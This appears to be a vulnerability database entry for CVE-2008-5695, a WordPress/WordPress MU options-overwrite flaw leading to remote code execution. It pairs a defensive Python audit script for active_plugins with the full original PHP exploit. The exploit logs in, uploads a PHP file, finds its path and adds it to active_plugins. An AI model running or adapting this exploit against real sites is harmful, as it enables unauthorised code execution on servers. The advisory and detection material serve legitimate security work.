WordPress 'wp-admin/options.php' Remote Code Execution Vulnerability

Vulnerability ID 1114491 Vulnerability type Input validation
Published 2008-02-05 Updated 2008-12-31
CVE ID CVE-2008-5695 CNNVD ID CNNVD-200812-408
Platform PHP CVSS score 8.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/5066
https://www.securityfocus.com/bid/27633
https://cxsecurity.com/issue/WLB-2008120184
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-408
|Vulnerability Details
WordPress is a blogging platform written in PHP. In WordPress MU before 1.3.2 and in WordPress 2.3.2 and earlier, wp-admin/options.php does not properly validate requests to update options. This allows a remote authenticated user who holds both the manage_options and upload_files capabilities to execute arbitrary code by uploading a PHP script and adding that script's pathname to the active_plugins option.
|Vulnerability EXP
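The attack described above leaves a distinctive artifact: an active_plugins entry that points outside wp-content/plugins (for example into the uploads directory). The following audit script is an added example, not part of the original advisory or of WordPress itself; it parses the PHP-serialized value of active_plugins as stored in the wp_options table and flags entries that are not a plain "plugin.php" or "dir/plugin.php" path (that two-component rule and the sample value are assumptions made for this example).

```python
import re

# Constructed sample: the active_plugins option as WordPress stores it in wp_options
# (a PHP-serialized array of strings). The third entry has the shape an
# options-overwrite attack produces: it escapes the plugins directory.
SAMPLE_ACTIVE_PLUGINS = (
    'a:3:{i:0;s:19:"akismet/akismet.php";'
    'i:1;s:9:"hello.php";'
    'i:2;s:29:"../uploads/2008/02/upload.php";}'
)


def parse_php_string_array(blob: str) -> list[str]:
    """Parse a PHP-serialized array of strings: a:N:{i:k;s:len:"...";...}.
    Only the subset WordPress writes for active_plugins is supported."""
    data = blob.encode("utf-8")  # PHP string lengths are byte counts, so work on bytes
    head = re.match(rb"a:(\d+):\{", data)
    if not head:
        raise ValueError("not a PHP-serialized array")
    count, pos, items = int(head.group(1)), head.end(), []
    for _ in range(count):
        entry = re.match(rb'i:\d+;s:(\d+):"', data[pos:])
        if not entry:
            raise ValueError(f"unexpected token at byte {pos}")
        start = pos + entry.end()
        end = start + int(entry.group(1))
        if data[end:end + 2] != b'";':
            raise ValueError(f"string length mismatch at byte {end}")
        items.append(data[start:end].decode("utf-8"))
        pos = end + 2
    if data[pos:pos + 1] != b"}":
        raise ValueError("missing closing brace")
    return items


def is_valid_plugin_entry(entry: str) -> bool:
    """Assumed rule: a legitimate entry is 'name.php' or 'dir/name.php', relative,
    with no empty, '.', '..' or backslash components, so it cannot leave the plugins dir."""
    if not entry.endswith(".php") or "\\" in entry:
        return False
    parts = entry.split("/")
    return len(parts) <= 2 and all(p not in ("", ".", "..") for p in parts)


def audit_active_plugins(blob: str) -> list[str]:
    """Return the active_plugins entries that should be investigated."""
    return [e for e in parse_php_string_array(blob) if not is_valid_plugin_entry(e)]


if __name__ == "__main__":
    for suspicious in audit_active_plugins(SAMPLE_ACTIVE_PLUGINS):
        print(f"suspicious active_plugins entry: {suspicious}")
```

On a live site the value to feed in is the option_value of the row where option_name = 'active_plugins'; any flagged entry that is also a file under wp-content/uploads is a strong indicator of this attack.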
<?php
/*
WordPress [MU] blog's options overwrite

Credits : Alexander Concha <alex at buayacorp dot com>
Website : http://www.buayacorp.com/
Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html

This exploit uses active_plugins option to execute arbitrary PHP
*/
include_once './class-snoopy.php';

// Fix Snoopy
class SnoopyExt extends Snoopy {
	function _prepare_post_body($formvars, $formfiles) {
		if ( is_string($formvars) ) {
			return $formvars;
		}
		return parent::_prepare_post_body($formvars, $formfiles);
	}
}

set_time_limit( 0 );

// Any user with 'manage_options' and 'upload_files' capabilities
$user = 'user';
$pass = '1234';
$blog_url = 'http://localhost.localdomain/mu/';
$remote_file = ''; // relative path to wp-content
$local_file = ''; // the contents of this file, if any, will be uploaded

$snoopy = new SnoopyExt();

$snoopy->maxredirs = 0;
$snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check';
$snoopy->submit("{$blog_url}wp-login.php", array('log' => $user, 'pwd' => $pass));

$snoopy->setcookies(); // Set auth cookies for future requests

if ( empty($remote_file) ) {
	// Upload a new file
	$snoopy->_submit_type = 'image/gif';
	$snoopy->submit("{$blog_url}wp-app.php?action=/attachments", get_contents());

	if ( preg_match('#<id>([^<]+)</id>#i', $snoopy->results, $match) ) {
		$remote_file = basename($match[1]);
	}
}
if ( empty($remote_file) ) die('Exploit failed...');

// Look for real path
$snoopy->fetch("{$blog_url}wp-admin/export.php?download");

if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy->results, $match) ) {
	$remote_file = preg_replace('#.*?wp-content#', '', $match[1]);
}
if ( empty($remote_file) ) die('Exploit failed...');

// It assumes that file uploads are stored within wp-content
$remote_file = '../' . ltrim($remote_file, '/');

$snoopy->fetch("{$blog_url}wp-admin/plugins.php");

// Recover previous active plugins
$active_plugins = array();
if ( preg_match_all('#action=deactivate&([^\']+)#', $snoopy->results, $matches) ) {
	foreach ($matches[0] as $plugin) {
		if ( preg_match('#plugin=([^&]+)#', $plugin, $match) )
			$active_plugins[] = urldecode($match[1]);
	}
	print_r($active_plugins);
}
$active_plugins[] = $remote_file;

// Fetch a valid nonce
$snoopy->fetch("{$blog_url}wp-admin/options-general.php");

if ( preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#', $snoopy->results, $match) ) {

	// Finally update active_plugins
	$snoopy->set_submit_normal();
	$snoopy->submit("{$blog_url}wp-admin/options.php",
		array(
			'active_plugins' => $active_plugins,
			'_wpnonce' => $match[1],
			'action' => 'update',
			'page_options' => 'active_plugins',
		));
}

function get_contents() {
	global $local_file;

	return file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>';
}
?>

# milw0rm.com [2008-02-05]
|Affected Products
WordPress MU 1.3.1
WordPress MU 1.3
WordPress MU 1.2.3
WordPress MU 1.2.2
WordPress 2.3.2
WordPress 2.3.1
|References

Source: BID
Name: 27633
Link: http://www.securityfocus.com/bid/27633
Source: MILW0RM
Name: 5066
Link: http://www.milw0rm.com/exploits/5066
Source: MISC
Link: http://www.buayacorp.com/files/wordpress/wp-blog-option-overwrite.txt
Source: MISC
Link: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html
Source: SREASON
Name: 4798
Link: http://securityreason.com/securityalert/4798
Source: SECUNIA
Name: 28789
Link: http://secunia.com/advisories/28789
Source: mu.wordpress.org
Link: http://mu.wordpress.org/forums/topic.php?id=7534&page&replies=1